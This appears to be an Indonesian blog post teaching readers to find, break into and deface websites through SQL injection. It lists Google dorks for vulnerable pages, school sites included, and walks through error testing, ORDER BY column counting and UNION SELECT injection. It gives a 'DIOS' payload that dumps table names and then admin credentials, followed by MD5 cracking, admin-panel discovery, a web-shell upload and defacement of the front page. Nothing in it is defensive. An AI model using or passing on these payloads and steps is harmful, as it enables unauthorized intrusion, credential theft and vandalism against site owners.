Tutorial SQL Injection

Tutorial SQL Injection




SQL INJECTION

Assalamu'alaikum
Ok kali ini saya akan share tutorial cara deface POC SQLi
Dikarenakan ada yang nanya "Bang share deface ini lah itulah alah mem*k :v"
Nah kali ini w akan share Tutorialnya
Ok Langsung saja pertama-tama kalian dorking dulu di google menggunakan Dork dibawah:
inurl:/home.php?page= site:com
inurl:/media.php?id=
inurl:/guru.php?id= site:sch.id
inurl:/events.php?id=
inurl:/play.php?id=
inurl:/detail.php?id=
Kembangkan dengan otak vokep atau waifu klean:v
Jika sudah kmudian kalian pilih salah satu target pilihan klean. jika sudah sekarang kalian harus memeriksa VULN atau tidak webtarget klean dengan menambahkan kutip dibellakang string target klean CONTOH:
http://webtarget.com/index.php?id=32
menjadi:
http://webtarget.com/index.php?id=32'
Jika muncul tulisan sql syntax error atau Mysql error berarti webtarget klean VULN
Jikaa tidak muncul cari web lain
Ok jika klean sudah menemukanya selanjutnya klean Tinggal melakukan sepperti dibawah ikuti saja
http://webtarget.com/index.php?id=32'+order+by+1--+
dan ganti angka 1 sampai strusnya smpai muncul tulisan error Column
atau kosong dari sebuah halaman tersbut
http://webtarget.com/index.php?id=32'+order+by+2--+[No error]
http://webtarget.com/index.php?id=32'+order+by+3--+[No error]
http://webtarget.com/index.php?id=32'+order+by+4--+[No error]
http://webtarget.com/index.php?id=32'+order+by+5--+[ ERROR ]
Nah kali ini saya mendapatkan pesan errornya di column 5
Berarti jumlah colum dalam web tersebut ada 4
OK SEKARANG waktunya kita akan mengubah ORDER sama BY menjadi UNION SELECT,, CONTOH:
http://webtarget.com/index.php?id=-32'+UNION+SELECT+1,2,3,4--+
Jika sudah maka akan muncul sebuah angka nah saya nemu angka 2 tinggal saya inject di column ke 2 dengan
dios dibawah kalian salin
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)
where@:=make_set(511,@,0x3c6c693e,
table_name,column_name)),@)

Dan angka 2 saya timpah dengan dios saya, Menjadi
http://webtarget.com/index.php?id=-32'+UNION+SELECT+1,
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)
where@:=make_set(511,@,0x3c6c693e,table_
name,column_name)),@),3,4--+

Nah maka berhasil kita inject Web tersebut waktunya kita Dump dengan cara kalian pilih salah satu yang akan kalian buka misalkan kalian ingin mengetahui username ama pasword web tersebut,, karna tujuan kalian ingin mendeface^_^,, webnyamaka kalian cari table yang
berhubung menuju ke admin,, misalkan saya disini, columnya adallah admin dan Tablenya adalah [USERNAME_DAN PASWORD]
Maka kalian tinggal rubah dios yang tadi menjadi
make_set(6,@:=0x0a,(select(1)from(admin)where@:=
make_set(511,@,0x3c6c693e,
USER_NAME,PASWORD)),@)
DAN Selesai kalian sudah mendapatkan username dan pasword web tersebut Nah biasanya username ama paswordnya masih dalam bentuk md5.
Seperti angka acak gitulah
Atau biasanya ada yang langsung jadi, dan jika paswordnya bentuknya MD5 maka kalian hanya Tinggal HASH md5 tersebut DISINI
atau kalian juga bisa cari di google HASH Kiler di mbah gugel:v
Ok jika sudah kalian hash md5 tersebut dan menjadi username ama pasword yang benar seperti
user: admin23
pasword: kattie28
Maka langkah selanjutnya kalian hanya harus menemukan ADLOGNYA atau admin login sama saja ya, misalkan
http://webtarget.com/admin
seperti diatas jika masih tidak ketemu kalian ganti menjadi
http://webtarget.com/webadmin
sampai ketemu jika tidak kalian bisa cari menggunakan admin finder, kalian bisa mendowload nya di playstore oke?
Dan jika sudah ketemu kalian tinggal masukan username sama ppasword web tersebut dan LOGIN
Dan jika kalian berhasil masuk sekarang kalian hanya perlu mencari tempat uploadnya, cari sampai berhasil lo sudah menjadi admin gimanasi gblk:v
Dan jika menemukanya kalian hanya upload file shell kalian Lalu panggil dan ganti halaman depanya DONE:v
Mungkin cukup sekian tutorial dari saya kali ini jika ada salah kata mohon dimaafkan
Terimakasih.

CONTACT ME ON INSTAGRAM : TOUCH ME SENPAI >_<






































0 comments :

Post a Comment